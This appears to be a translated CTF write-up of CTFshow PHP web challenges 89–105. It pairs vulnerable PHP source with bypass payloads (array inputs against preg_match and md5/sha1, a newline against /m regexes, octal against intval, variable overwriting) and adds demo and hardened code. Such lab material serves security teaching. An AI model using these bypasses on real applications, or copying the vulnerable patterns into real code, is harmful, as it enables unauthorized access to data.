老同志爱聊天 posted on 2020-10-11 18:01:00

CTFshow Web Basics (PHP features)

<h2 id="web-89">web 89</h2>
<pre><code class="language-php">&lt;?php


include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("//", $num)){
      die("no no no!");
    }
    if(intval($num)){
      echo $flag;
    }
}
</code></pre>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011145924146-225894892.png" alt="" loading="lazy"></p>
<p>Passing an array bypasses this check</p>
<p>payload:?num[]=1</p>
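<p>An added example (not from the original post) that runs the web 89 checks on a string and on an array, then shows the same check rewritten to reject anything that is not a string. Function names are assumptions.</p>

```php
<?php
// Added example, not from the original post: the web 89 checks applied to a
// string and to an array, plus a version that rejects non-string input.
// Under PHP 7, preg_match() given an array emits a warning and returns NULL
// instead of 1, so the die() branch is skipped; PHP 8 throws a TypeError.
function challenge_check($num): string {
    if (@preg_match("//", $num)) {      // pattern as shown on the page: matches any string
        return "no no no!";
    }
    if (intval($num)) {                 // intval() of a non-empty array is 1
        return "flag";
    }
    return "(nothing)";
}

function strict_check($num): string {
    if (!is_string($num)) {             // arrays never reach preg_match()/intval()
        return "rejected: not a string";
    }
    if (preg_match("//", $num) !== 0) { // anything but a clean "no match" is a failure
        return "no no no!";
    }
    return intval($num) ? "flag" : "(nothing)";
}

// Constructed inputs: ?num=1 arrives as a string, ?num[]=1 as an array
echo challenge_check("1"), "\n";        // string: preg_match() returns 1, die() branch
echo challenge_check(["1"]), "\n";      // array: preg_match() returns NULL, flag branch
echo strict_check(["1"]), "\n";         // array is refused before any check runs
```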
<h2 id="web-90">web 90</h2>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011151456068-1756074675.png" alt="" loading="lazy"></p>
<h2 id="web-91">web 91</h2>
<pre><code class="language-php">&lt;?php

show_source(__FILE__);
include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
      echo 'hacker';
    }
    else{
      echo $flag;
    }
}
else{
    echo 'nonononono';
}
</code></pre>
<pre><code>/i means the match is case-insensitive

/m means multiline matching. What is multiline matching? Text on either side of a newline is treated as a candidate match, which changes what ^ and $ match in the regex
</code></pre>
<p>The main breakthrough here is /m: the first preg_match() has the /m modifier and the second regex does not, so we can use a newline to bypass it</p>
<p>payload:?cmd=%0aphp</p>
<p>Note: %0a is a newline</p>
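<p>An added example (not from the original post) that feeds a few constructed inputs through the two web 91 patterns and compares them with anchors that do not depend on /m. Function names are assumptions.</p>

```php
<?php
// Added example, not from the original post: how the two web 91 anchors
// treat a leading newline, and an anchor pair that does not depend on /m.
function classify(string $cmd): string {
    if (preg_match('/^php$/im', $cmd)) {                // ^ and $ match at every line
        return preg_match('/^php$/i', $cmd) ? 'hacker' : 'flag';
    }
    return 'nonononono';
}

function strict_is_php(string $cmd): bool {
    // \A and \z anchor to the real start and end of the subject. /m has no
    // effect on them, and \z (unlike $) does not accept a trailing newline.
    return preg_match('/\Aphp\z/i', $cmd) === 1;
}

// Constructed inputs: the plain word, the %0a-prefixed payload, a trailing
// newline (which even the /i-only pattern accepts, because $ matches before
// a final newline), and an uppercase variant.
foreach (["php", "\nphp", "php\n", "PHP"] as $cmd) {
    printf("%-8s classify=%-10s strict=%s\n", json_encode($cmd),
        classify($cmd), strict_is_php($cmd) ? 'yes' : 'no');
}
```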
<h2 id="web-92">web 92</h2>
<p>Same as web 90</p>
<p>payload:?num=0x117c</p>
<h2 id="web-93">web 93</h2>
<pre><code class="language-php">&lt;?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
      die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
      die("no no no!");
    }
    if(intval($num,0)==4476){
      echo $flag;
    }else{
      echo intval($num,0);
    }
}
</code></pre>
<p>Letters are filtered, so hex cannot be used; switch to octal</p>
<p>payload:?num=010574</p>
<p>4476 in octal is 10574</p>
<h2 id="web-94">web 94</h2>
<pre><code class="language-php">&lt;?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
      die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
      die("no no no!");
    }
    if(!strpos($num, "0")){
      die("no no no!");
    }
    if(intval($num,0)===4476){
      echo $flag;
    }
}
</code></pre>
<p><strong>strpos()</strong></p>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011152911526-1511795862.png" alt="" loading="lazy"></p>
<p>For strpos(), we can bypass it with a newline (%0a)</p>
<p>payload:?num=%0a010574</p>
<p>A decimal point also works</p>
<p>payload:?num=4476.0</p>
<p>because intval() only reads the integer part</p>
<p>Octal also works (%20 is the URL-encoded space)</p>
<p>payload:?num=%20010574</p>
<h2 id="web-95">web 95</h2>
<pre><code class="language-php">&lt;?php

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
      die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
      die("no no no!!");
    }
    if(!strpos($num, "0")){
      die("no no no!!!");
    }
    if(intval($num,0)===4476){
      echo $flag;
    }
}
</code></pre>
<p>Octal bypass: a leading space (%20) or plus sign keeps the "0" out of position 0 so the strpos() check passes, and intval() with base 0 still reads the number as octal</p>
<p>payload:?num=%20010574</p>
<p>payload:?num=+010574</p>
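<p>An added example (not from the original post) covering web 93 to web 95: it runs the loose comparison, the letter/dot filter, the strpos() check and intval() with base 0 over a set of constructed inputs, beside a strict check that only accepts plain decimal digits. Function names are assumptions.</p>

```php
<?php
// Added example, not from the original post: the web 93-95 style checks
// (loose ==, letter/dot filter, strpos, intval with base 0) run over a set
// of constructed inputs, next to a strict check that only takes plain digits.
function loose_check(string $num): string {
    if ($num == 4476) {                       // loose compare catches "4476.0" too
        return "blocked: == 4476";
    }
    if (preg_match('/[a-z]|\./i', $num)) {   // web 95 filter: letters and dots
        return "blocked: letters or dot";
    }
    if (!strpos($num, "0")) {                // a "0" at position 0 is falsy -> blocked
        return "blocked: strpos";
    }
    return intval($num, 0) === 4476 ? "flag" : "value " . intval($num, 0);
}

function strict_check(string $num): string {
    // Canonical decimal digits only, then compare as a base-10 integer: no
    // prefix, whitespace, sign or fraction can change the parsed value.
    if (!preg_match('/\A[0-9]+\z/', $num) || (int)$num !== 4476) {
        return "blocked";
    }
    return "flag";
}

// intval($s, 0) follows strtol(): leading whitespace and sign are skipped,
// "0x" selects hex, a leading "0" selects octal, and parsing stops at ".".
$inputs = ["4476", "0x117c", "010574", "4476.0", " 010574", "+010574", "\n010574"];
foreach ($inputs as $in) {
    printf("%-10s intval(,0)=%-5d loose=%-24s strict=%s\n",
        json_encode($in), intval($in, 0), loose_check($in), strict_check($in));
}
```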
<h2 id="web-96">web 96</h2>
<pre><code class="language-php">&lt;?php

highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
      die("no no no");
    }else{
      highlight_file($_GET['u']);
    }


}
</code></pre>
<p>payload:?u=./flag.php</p>
<p>That is, display the flag.php file in the current directory</p>
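<p>An added example (not from the original post) showing why the web 96 string comparison against "flag.php" does not cover "./flag.php", beside a check on the resolved path. The temporary directory, its two files and the function names are constructed for the demo.</p>

```php
<?php
// Added example, not from the original post: the web 96 string comparison
// against "flag.php" versus a check on the resolved path. The demo directory
// and its two files are constructed here so the script runs stand-alone.
function weak_block(string $u): bool {
    return $u == 'flag.php';                 // "./flag.php" is a different string
}

function resolved_block(string $u, string $baseDir): bool {
    $base = realpath($baseDir);
    $real = realpath($baseDir . '/' . $u);   // canonical path, or false if missing
    if ($base === false || $real === false) {
        return true;                         // refuse anything that does not resolve
    }
    // Refuse anything outside the base directory and the protected file itself
    return strncmp($real, $base . '/', strlen($base) + 1) !== 0
        || basename($real) === 'flag.php';
}

$dir = sys_get_temp_dir() . '/web96_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/flag.php", "<?php \$flag = 'constructed';");
file_put_contents("$dir/index.php", "<?php echo 'index';");

// Constructed inputs: the literal name, the web 96 bypass, a harmless file,
// and a traversal attempt that the resolved check refuses as outside $dir
foreach (['flag.php', './flag.php', 'index.php', '../../etc/passwd'] as $u) {
    printf("%-18s weak=%-8s resolved=%s\n", $u,
        weak_block($u) ? 'blocked' : 'allowed',
        resolved_block($u, $dir) ? 'blocked' : 'allowed');
}

unlink("$dir/flag.php");
unlink("$dir/index.php");
rmdir($dir);
```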
<h2 id="web-97">web 97</h2>
<pre><code class="language-php">&lt;?php


include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?&gt;
</code></pre>
<p>MD5 collision</p>
<p>payload: a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&amp;b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2</p>
<p>payload:a[]=1&amp;b[]=1</p>
<h2 id="web-98">web 98</h2>
<pre><code class="language-php">&lt;?php

include("flag.php");
$_GET?$_GET=&amp;$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&amp;$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&amp;$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

?&gt;
</code></pre>
<p>The flag came out somewhat by accident; here is the rough idea</p>
<p>The key parts are the ternary operator and variable overwriting</p>
<p>$_GET?$_GET=&amp;$_POST:'flag';   means that if a GET request is present, $_GET is made a reference to $_POST, so the POST data takes the place of the GET data</p>
<p>highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);   means that if the HTTP_FLAG parameter equals flag, the flag is read</p>
<p>So I constructed GET: ?flag=123</p>
<p>POST: HTTP_FLAG=flag</p>
<p>and got the flag</p>
<h2 id="web-99">web 99</h2>
<pre><code class="language-php">&lt;?php

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i &lt; 0x36d; $i++) {
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) &amp;&amp; in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?&gt;
</code></pre>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011170214587-1349496403.png" alt="" loading="lazy"></p>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011170218723-337399830.png" alt="" loading="lazy"></p>
<p>After that, just cat flag36d.php</p>
<h2 id="web-100">web 100</h2>
<h2 id="web-104">web 104</h2>
<pre><code class="language-php">&lt;?php

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) &amp;&amp; isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
      echo $flag;
    }
}

?&gt;
</code></pre>
<p>Similar to the MD5 collision</p>
<p>payload:</p>
<p>GET:v2=1</p>
<p>POST: v1[]=2</p>
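<p>An added example (not from the original post) for web 97 and web 104: it shows why both hash comparisons can be satisfied with two arrays, beside a version that refuses non-string input and compares in constant time. Function names are assumptions.</p>

```php
<?php
// Added example, not from the original post: why the web 97 / web 104
// comparisons can be satisfied with two arrays, next to a version that
// refuses non-string input. Under PHP 7, md5()/sha1() given an array emit a
// warning and return NULL, so NULL === NULL holds; PHP 8 throws a TypeError.
function weak_compare($a, $b): bool {
    return $a != $b && @md5($a) === @md5($b);   // web 97 logic, warning suppressed
}

function loose_sha1_compare($v1, $v2): bool {
    return @sha1($v1) == @sha1($v2);            // web 104 logic
}

function safe_compare($a, $b): bool {
    if (!is_string($a) || !is_string($b)) {     // arrays never reach the hash
        return false;
    }
    return hash_equals(md5($a), md5($b));       // constant-time string comparison
}

// Constructed inputs: two different strings, then two arrays with different contents
var_dump(weak_compare("1", "2"));               // different hashes, fails
var_dump(weak_compare(["1"], ["2"]));           // arrays differ, NULL === NULL holds
var_dump(loose_sha1_compare(["1"], ["2"]));     // NULL == NULL holds
var_dump(safe_compare(["1"], ["2"]));           // refused: not strings
var_dump(safe_compare("abc", "abc"));           // same string, same hash
```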
<h2 id="web-105">web 105</h2>
<pre><code class="language-php">&lt;?php

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key =&gt; $value){
    if($key==='error'){
      die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key =&gt; $value){
    if($value==='flag'){
      die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

?&gt;
</code></pre>
<p>Payload first:</p>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011175122661-1805967714.png" alt="" loading="lazy"></p>
<pre><code>foreach($_GET as $key =&gt; $value){
    if($key==='error'){
      die("what are you doing?!");
    }
    $$key=$$value;
}
//This step is a variable overwrite: passing suces=flag ends up as
//$suces=$flag, i.e. the flag is assigned to the suces variable
</code></pre>
<p><img src="https://img2020.cnblogs.com/blog/1999159/202010/1999159-20201011175841352-765546649.png" alt="" loading="lazy"></p>
<p>We can see that with only the GET request, the error message is printed, which means we just need to assign the flag to the error variable</p>
<pre><code>foreach($_POST as $key =&gt; $value){
    if($value==='flag'){
      die("what are you doing?!");
    }
    $$key=$$value;
}
//With POST error=suces we get $error=$suces; combined with the GET request this gives $error=$flag, so the flag's value has been assigned to the error variable
</code></pre><br><br>
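<p>An added example (not from the original post) that replays the web 105 overwrite chain on constructed request data and then shows a loop that copies only expected keys into an array, so request data can no longer rename or alias variables. The flag value, the two request arrays and the allow-list are constructed for the demo.</p>

```php
<?php
// Added example, not from the original post: the web 105 overwrite chain
// replayed on constructed input, then a loop that copies request keys into
// an array instead of the symbol table so $flag/$error/$suces cannot be rebound.
$flag  = 'ctfshow{constructed-placeholder}';   // stands in for flag.php
$error = 'do you still want the flag?';
$suces = 'fine, take it then!';

$get  = ['suces' => 'flag'];    // constructed GET:  ?suces=flag
$post = ['error' => 'suces'];   // constructed POST: error=suces

foreach ($get as $key => $value) {
    if ($key === 'error') { die("what are you doing?!"); }
    $$key = $$value;            // $suces = $flag
}
foreach ($post as $key => $value) {
    if ($value === 'flag') { die("what are you doing?!"); }
    $$key = $$value;            // $error = $suces, which now holds the flag
}
echo "die(\$error) would now print: ", $error, "\n";

// Hardened variant: expected keys only, stored in a dedicated array; request
// data can no longer name or alias a variable in the script.
$allowed = ['name', 'lang'];
$input = [];
foreach ($get + $post as $key => $value) {
    if (in_array($key, $allowed, true)) {       // strict in_array, no loose matching
        $input[$key] = (string)$value;
    }
}
var_dump($input);                               // neither "suces" nor "error" is accepted
```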
Source: https://www.cnblogs.com/NPFS/p/13798533.html